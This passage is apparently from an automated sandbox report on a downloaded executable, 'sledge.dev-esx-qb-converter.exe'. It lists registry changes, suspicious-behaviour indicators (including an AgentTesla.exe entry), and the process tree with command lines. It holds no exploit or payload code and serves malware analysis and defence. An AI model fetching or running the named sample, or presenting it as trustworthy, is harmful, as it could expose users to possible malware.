Set value (data)	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	sledge.dev-esx-qb-converter.exe
Key created	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000_Classes\Local Settings	chrome.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\SniffedFolderType = "Downloads"	sledge.dev-esx-qb-converter.exe
Key created	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg	sledge.dev-esx-qb-converter.exe
Key created	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell	sledge.dev-esx-qb-converter.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	sledge.dev-esx-qb-converter.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4"	sledge.dev-esx-qb-converter.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Version = "1"	sledge.dev-esx-qb-converter.exe
Key created	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell	sledge.dev-esx-qb-converter.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202	sledge.dev-esx-qb-converter.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	sledge.dev-esx-qb-converter.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02	sledge.dev-esx-qb-converter.exe
Key created	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg	sledge.dev-esx-qb-converter.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	sledge.dev-esx-qb-converter.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1"	sledge.dev-esx-qb-converter.exe
Key created	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}	sledge.dev-esx-qb-converter.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupView = "4294967295"	sledge.dev-esx-qb-converter.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\2\0\NodeSlot = "4"	sledge.dev-esx-qb-converter.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16"	sledge.dev-esx-qb-converter.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\2\MRUListEx = 00000000ffffffff	sledge.dev-esx-qb-converter.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff	sledge.dev-esx-qb-converter.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\KnownFolderDerivedFolderType = "{885A186E-A440-4ADA-812B-DB871B942259}"	sledge.dev-esx-qb-converter.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 010000000200000000000000ffffffff	sledge.dev-esx-qb-converter.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	sledge.dev-esx-qb-converter.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\2\0 = 4e003100000000003659f8081000676f6f6400003a0009000400efbe3659f8083659f8082e000000993402000000080000000000000000000000000000001a7e000067006f006f006400000014000000	sledge.dev-esx-qb-converter.exe
Key created	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	sledge.dev-esx-qb-converter.exe

NTFS ADS 9 IoCs

Processes:

msedge.exe

description	ioc	process
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 497669.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 288596.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 217135.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 625160.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 862161.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 990892.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 270027.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 301758.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 698771.crdownload:SmartScreen	msedge.exe

Suspicious behavior: AddClipboardFormatListener 2 IoCs

Processes:

WINWORD.EXE

pid process

5912 WINWORD.EXE
5912 WINWORD.EXE

pid	process
5912	WINWORD.EXE
5912	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 29 IoCs

Processes:

chrome.exechrome.exemsedge.exemsedge.exeidentity_helper.exemsedge.exemsedge.exemsedge.exemsedge.exemsedge.exepowershell.exeDiagnosticsHub.StandardCollector.Service.exe

pid	process
1120	chrome.exe
1120	chrome.exe
1468	chrome.exe
1468	chrome.exe
1468	chrome.exe
1468	chrome.exe
2216	msedge.exe
2216	msedge.exe
4720	msedge.exe
4720	msedge.exe
212	identity_helper.exe
212	identity_helper.exe
5324	msedge.exe
5324	msedge.exe
5620	msedge.exe
5620	msedge.exe
5628	msedge.exe
5628	msedge.exe
5628	msedge.exe
5628	msedge.exe
6124	msedge.exe
6124	msedge.exe
2272	msedge.exe
2272	msedge.exe
5232	powershell.exe
5232	powershell.exe
5232	powershell.exe
5064	DiagnosticsHub.StandardCollector.Service.exe
5064	DiagnosticsHub.StandardCollector.Service.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

sledge.dev-esx-qb-converter.exe

pid process

3188 sledge.dev-esx-qb-converter.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 40 IoCs

Processes:

chrome.exemsedge.exe

pid	process
1120	chrome.exe
1120	chrome.exe
1120	chrome.exe
1120	chrome.exe
1120	chrome.exe
1120	chrome.exe
1120	chrome.exe
1120	chrome.exe
4720	msedge.exe
4720	msedge.exe
4720	msedge.exe
4720	msedge.exe
4720	msedge.exe
4720	msedge.exe
4720	msedge.exe
4720	msedge.exe
4720	msedge.exe
4720	msedge.exe
4720	msedge.exe
4720	msedge.exe
4720	msedge.exe
4720	msedge.exe
4720	msedge.exe
4720	msedge.exe
4720	msedge.exe
4720	msedge.exe
4720	msedge.exe
4720	msedge.exe
4720	msedge.exe
4720	msedge.exe
4720	msedge.exe
4720	msedge.exe
4720	msedge.exe
4720	msedge.exe
4720	msedge.exe
4720	msedge.exe
4720	msedge.exe
4720	msedge.exe
4720	msedge.exe
4720	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

chrome.exe

description	pid	process
Token: SeShutdownPrivilege	1120	chrome.exe
Token: SeCreatePagefilePrivilege	1120	chrome.exe
Token: SeShutdownPrivilege	1120	chrome.exe
Token: SeCreatePagefilePrivilege	1120	chrome.exe
Token: SeShutdownPrivilege	1120	chrome.exe
Token: SeCreatePagefilePrivilege	1120	chrome.exe
Token: SeShutdownPrivilege	1120	chrome.exe
Token: SeCreatePagefilePrivilege	1120	chrome.exe
Token: SeShutdownPrivilege	1120	chrome.exe
Token: SeCreatePagefilePrivilege	1120	chrome.exe
Token: SeShutdownPrivilege	1120	chrome.exe
Token: SeCreatePagefilePrivilege	1120	chrome.exe
Token: SeShutdownPrivilege	1120	chrome.exe
Token: SeCreatePagefilePrivilege	1120	chrome.exe
Token: SeShutdownPrivilege	1120	chrome.exe
Token: SeCreatePagefilePrivilege	1120	chrome.exe
Token: SeShutdownPrivilege	1120	chrome.exe
Token: SeCreatePagefilePrivilege	1120	chrome.exe
Token: SeShutdownPrivilege	1120	chrome.exe
Token: SeCreatePagefilePrivilege	1120	chrome.exe
Token: SeShutdownPrivilege	1120	chrome.exe
Token: SeCreatePagefilePrivilege	1120	chrome.exe
Token: SeShutdownPrivilege	1120	chrome.exe
Token: SeCreatePagefilePrivilege	1120	chrome.exe
Token: SeShutdownPrivilege	1120	chrome.exe
Token: SeCreatePagefilePrivilege	1120	chrome.exe
Token: SeShutdownPrivilege	1120	chrome.exe
Token: SeCreatePagefilePrivilege	1120	chrome.exe
Token: SeShutdownPrivilege	1120	chrome.exe
Token: SeCreatePagefilePrivilege	1120	chrome.exe
Token: SeShutdownPrivilege	1120	chrome.exe
Token: SeCreatePagefilePrivilege	1120	chrome.exe
Token: SeShutdownPrivilege	1120	chrome.exe
Token: SeCreatePagefilePrivilege	1120	chrome.exe
Token: SeShutdownPrivilege	1120	chrome.exe
Token: SeCreatePagefilePrivilege	1120	chrome.exe
Token: SeShutdownPrivilege	1120	chrome.exe
Token: SeCreatePagefilePrivilege	1120	chrome.exe
Token: SeShutdownPrivilege	1120	chrome.exe
Token: SeCreatePagefilePrivilege	1120	chrome.exe
Token: SeShutdownPrivilege	1120	chrome.exe
Token: SeCreatePagefilePrivilege	1120	chrome.exe
Token: SeShutdownPrivilege	1120	chrome.exe
Token: SeCreatePagefilePrivilege	1120	chrome.exe
Token: SeShutdownPrivilege	1120	chrome.exe
Token: SeCreatePagefilePrivilege	1120	chrome.exe
Token: SeShutdownPrivilege	1120	chrome.exe
Token: SeCreatePagefilePrivilege	1120	chrome.exe
Token: SeShutdownPrivilege	1120	chrome.exe
Token: SeCreatePagefilePrivilege	1120	chrome.exe
Token: SeShutdownPrivilege	1120	chrome.exe
Token: SeCreatePagefilePrivilege	1120	chrome.exe
Token: SeShutdownPrivilege	1120	chrome.exe
Token: SeCreatePagefilePrivilege	1120	chrome.exe
Token: SeShutdownPrivilege	1120	chrome.exe
Token: SeCreatePagefilePrivilege	1120	chrome.exe
Token: SeShutdownPrivilege	1120	chrome.exe
Token: SeCreatePagefilePrivilege	1120	chrome.exe
Token: SeShutdownPrivilege	1120	chrome.exe
Token: SeCreatePagefilePrivilege	1120	chrome.exe
Token: SeShutdownPrivilege	1120	chrome.exe
Token: SeCreatePagefilePrivilege	1120	chrome.exe
Token: SeShutdownPrivilege	1120	chrome.exe
Token: SeCreatePagefilePrivilege	1120	chrome.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

chrome.exesledge.dev-esx-qb-converter.exe7zG.exemsedge.exe

pid	process
1120	chrome.exe
1120	chrome.exe
1120	chrome.exe
1120	chrome.exe
1120	chrome.exe
1120	chrome.exe
1120	chrome.exe
1120	chrome.exe
1120	chrome.exe
1120	chrome.exe
1120	chrome.exe
1120	chrome.exe
1120	chrome.exe
1120	chrome.exe
1120	chrome.exe
1120	chrome.exe
1120	chrome.exe
1120	chrome.exe
1120	chrome.exe
1120	chrome.exe
1120	chrome.exe
1120	chrome.exe
1120	chrome.exe
1120	chrome.exe
1120	chrome.exe
1120	chrome.exe
1120	chrome.exe
1120	chrome.exe
1120	chrome.exe
1120	chrome.exe
1120	chrome.exe
1120	chrome.exe
1120	chrome.exe
1120	chrome.exe
1120	chrome.exe
3188	sledge.dev-esx-qb-converter.exe
1120	chrome.exe
1120	chrome.exe
1120	chrome.exe
1120	chrome.exe
1120	chrome.exe
1120	chrome.exe
1120	chrome.exe
3328	7zG.exe
3188	sledge.dev-esx-qb-converter.exe
3188	sledge.dev-esx-qb-converter.exe
4720	msedge.exe
4720	msedge.exe
4720	msedge.exe
4720	msedge.exe
4720	msedge.exe
4720	msedge.exe
4720	msedge.exe
4720	msedge.exe
4720	msedge.exe
4720	msedge.exe
4720	msedge.exe
4720	msedge.exe
4720	msedge.exe
4720	msedge.exe
4720	msedge.exe
4720	msedge.exe
4720	msedge.exe
4720	msedge.exe

Suspicious use of SendNotifyMessage 64 IoCs

Processes:

chrome.exemsedge.exeButterflyOnDesktop.exe

pid	process
1120	chrome.exe
1120	chrome.exe
1120	chrome.exe
1120	chrome.exe
1120	chrome.exe
1120	chrome.exe
1120	chrome.exe
1120	chrome.exe
1120	chrome.exe
1120	chrome.exe
1120	chrome.exe
1120	chrome.exe
1120	chrome.exe
1120	chrome.exe
1120	chrome.exe
1120	chrome.exe
1120	chrome.exe
1120	chrome.exe
1120	chrome.exe
1120	chrome.exe
1120	chrome.exe
1120	chrome.exe
1120	chrome.exe
1120	chrome.exe
4720	msedge.exe
4720	msedge.exe
4720	msedge.exe
4720	msedge.exe
4720	msedge.exe
4720	msedge.exe
4720	msedge.exe
4720	msedge.exe
4720	msedge.exe
4720	msedge.exe
4720	msedge.exe
4720	msedge.exe
4720	msedge.exe
4720	msedge.exe
4720	msedge.exe
4720	msedge.exe
4720	msedge.exe
4720	msedge.exe
4720	msedge.exe
4720	msedge.exe
4720	msedge.exe
4720	msedge.exe
4720	msedge.exe
4720	msedge.exe
5876	ButterflyOnDesktop.exe
4720	msedge.exe
4720	msedge.exe
4720	msedge.exe
4720	msedge.exe
4720	msedge.exe
4720	msedge.exe
4720	msedge.exe
4720	msedge.exe
4720	msedge.exe
4720	msedge.exe
4720	msedge.exe
4720	msedge.exe
4720	msedge.exe
4720	msedge.exe
4720	msedge.exe

Suspicious use of SetWindowsHookEx 25 IoCs

Processes:

sledge.dev-esx-qb-converter.exeAgentTesla.exeWINWORD.EXEiexplore.exeIEXPLORE.EXELogonUI.exe

pid	process
3188	sledge.dev-esx-qb-converter.exe
3188	sledge.dev-esx-qb-converter.exe
392	AgentTesla.exe
5912	WINWORD.EXE
5912	WINWORD.EXE
5912	WINWORD.EXE
5912	WINWORD.EXE
5912	WINWORD.EXE
5912	WINWORD.EXE
5912	WINWORD.EXE
5912	WINWORD.EXE
5912	WINWORD.EXE
4452	iexplore.exe
4452	iexplore.exe
5324	IEXPLORE.EXE
5324	IEXPLORE.EXE
5324	IEXPLORE.EXE
5324	IEXPLORE.EXE
5324	IEXPLORE.EXE
5324	IEXPLORE.EXE
5324	IEXPLORE.EXE
5324	IEXPLORE.EXE
5324	IEXPLORE.EXE
5324	IEXPLORE.EXE
3780	LogonUI.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

chrome.exe

description	pid	process	target process
PID 1120 wrote to memory of 1456	1120	chrome.exe	chrome.exe
PID 1120 wrote to memory of 1456	1120	chrome.exe	chrome.exe
PID 1120 wrote to memory of 1068	1120	chrome.exe	chrome.exe
PID 1120 wrote to memory of 1068	1120	chrome.exe	chrome.exe
PID 1120 wrote to memory of 1068	1120	chrome.exe	chrome.exe
PID 1120 wrote to memory of 1068	1120	chrome.exe	chrome.exe
PID 1120 wrote to memory of 1068	1120	chrome.exe	chrome.exe
PID 1120 wrote to memory of 1068	1120	chrome.exe	chrome.exe
PID 1120 wrote to memory of 1068	1120	chrome.exe	chrome.exe
PID 1120 wrote to memory of 1068	1120	chrome.exe	chrome.exe
PID 1120 wrote to memory of 1068	1120	chrome.exe	chrome.exe
PID 1120 wrote to memory of 1068	1120	chrome.exe	chrome.exe
PID 1120 wrote to memory of 1068	1120	chrome.exe	chrome.exe
PID 1120 wrote to memory of 1068	1120	chrome.exe	chrome.exe
PID 1120 wrote to memory of 1068	1120	chrome.exe	chrome.exe
PID 1120 wrote to memory of 1068	1120	chrome.exe	chrome.exe
PID 1120 wrote to memory of 1068	1120	chrome.exe	chrome.exe
PID 1120 wrote to memory of 1068	1120	chrome.exe	chrome.exe
PID 1120 wrote to memory of 1068	1120	chrome.exe	chrome.exe
PID 1120 wrote to memory of 1068	1120	chrome.exe	chrome.exe
PID 1120 wrote to memory of 1068	1120	chrome.exe	chrome.exe
PID 1120 wrote to memory of 1068	1120	chrome.exe	chrome.exe
PID 1120 wrote to memory of 1068	1120	chrome.exe	chrome.exe
PID 1120 wrote to memory of 1068	1120	chrome.exe	chrome.exe
PID 1120 wrote to memory of 1068	1120	chrome.exe	chrome.exe
PID 1120 wrote to memory of 1068	1120	chrome.exe	chrome.exe
PID 1120 wrote to memory of 1068	1120	chrome.exe	chrome.exe
PID 1120 wrote to memory of 1068	1120	chrome.exe	chrome.exe
PID 1120 wrote to memory of 1068	1120	chrome.exe	chrome.exe
PID 1120 wrote to memory of 1068	1120	chrome.exe	chrome.exe
PID 1120 wrote to memory of 1068	1120	chrome.exe	chrome.exe
PID 1120 wrote to memory of 1068	1120	chrome.exe	chrome.exe
PID 1120 wrote to memory of 3720	1120	chrome.exe	chrome.exe
PID 1120 wrote to memory of 3720	1120	chrome.exe	chrome.exe
PID 1120 wrote to memory of 4164	1120	chrome.exe	chrome.exe
PID 1120 wrote to memory of 4164	1120	chrome.exe	chrome.exe
PID 1120 wrote to memory of 4164	1120	chrome.exe	chrome.exe
PID 1120 wrote to memory of 4164	1120	chrome.exe	chrome.exe
PID 1120 wrote to memory of 4164	1120	chrome.exe	chrome.exe
PID 1120 wrote to memory of 4164	1120	chrome.exe	chrome.exe
PID 1120 wrote to memory of 4164	1120	chrome.exe	chrome.exe
PID 1120 wrote to memory of 4164	1120	chrome.exe	chrome.exe
PID 1120 wrote to memory of 4164	1120	chrome.exe	chrome.exe
PID 1120 wrote to memory of 4164	1120	chrome.exe	chrome.exe
PID 1120 wrote to memory of 4164	1120	chrome.exe	chrome.exe
PID 1120 wrote to memory of 4164	1120	chrome.exe	chrome.exe
PID 1120 wrote to memory of 4164	1120	chrome.exe	chrome.exe
PID 1120 wrote to memory of 4164	1120	chrome.exe	chrome.exe
PID 1120 wrote to memory of 4164	1120	chrome.exe	chrome.exe
PID 1120 wrote to memory of 4164	1120	chrome.exe	chrome.exe
PID 1120 wrote to memory of 4164	1120	chrome.exe	chrome.exe
PID 1120 wrote to memory of 4164	1120	chrome.exe	chrome.exe
PID 1120 wrote to memory of 4164	1120	chrome.exe	chrome.exe
PID 1120 wrote to memory of 4164	1120	chrome.exe	chrome.exe
PID 1120 wrote to memory of 4164	1120	chrome.exe	chrome.exe
PID 1120 wrote to memory of 4164	1120	chrome.exe	chrome.exe
PID 1120 wrote to memory of 4164	1120	chrome.exe	chrome.exe
PID 1120 wrote to memory of 4164	1120	chrome.exe	chrome.exe
PID 1120 wrote to memory of 4164	1120	chrome.exe	chrome.exe
PID 1120 wrote to memory of 4164	1120	chrome.exe	chrome.exe
PID 1120 wrote to memory of 4164	1120	chrome.exe	chrome.exe
PID 1120 wrote to memory of 4164	1120	chrome.exe	chrome.exe
PID 1120 wrote to memory of 4164	1120	chrome.exe	chrome.exe
PID 1120 wrote to memory of 4164	1120	chrome.exe	chrome.exe

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://github.com/sledgehamm3r/ESX-QBCore-Converter/releases/download/Release/sledge.dev-esx-qb-converter.exe
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1120
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff8adeccc40,0x7ff8adeccc4c,0x7ff8adeccc58
  2⤵
  PID:1456
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1892,i,7500946504219336592,14082658955787626460,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=1888 /prefetch:2
  2⤵
  PID:1068
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2132,i,7500946504219336592,14082658955787626460,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=2164 /prefetch:3
  2⤵
  PID:3720
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2228,i,7500946504219336592,14082658955787626460,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=2436 /prefetch:8
  2⤵
  PID:4164
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3116,i,7500946504219336592,14082658955787626460,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3156 /prefetch:1
  2⤵
  PID:4612
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3124,i,7500946504219336592,14082658955787626460,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3208 /prefetch:1
  2⤵
  PID:2876
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4716,i,7500946504219336592,14082658955787626460,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4760 /prefetch:8
  2⤵
  PID:1116
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=4972,i,7500946504219336592,14082658955787626460,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4976 /prefetch:8
  2⤵
  PID:3000
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5008,i,7500946504219336592,14082658955787626460,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5136 /prefetch:8
  2⤵
  PID:5012
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5204,i,7500946504219336592,14082658955787626460,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5192 /prefetch:8
  2⤵
  PID:4116
- C:\Users\Admin\Downloads\sledge.dev-esx-qb-converter.exe
  "C:\Users\Admin\Downloads\sledge.dev-esx-qb-converter.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Modifies registry class
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SetWindowsHookEx
  PID:3188
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://ko-fi.com/sledgedev
    3⤵
    - Enumerates system info in registry
    - NTFS ADS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    PID:4720
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff89c8c46f8,0x7ff89c8c4708,0x7ff89c8c4718
      4⤵
      PID:4644
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2152,5000518464462067060,14515228480497859283,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2192 /prefetch:2
      4⤵
      PID:2672
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2152,5000518464462067060,14515228480497859283,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2308 /prefetch:3
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:2216
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
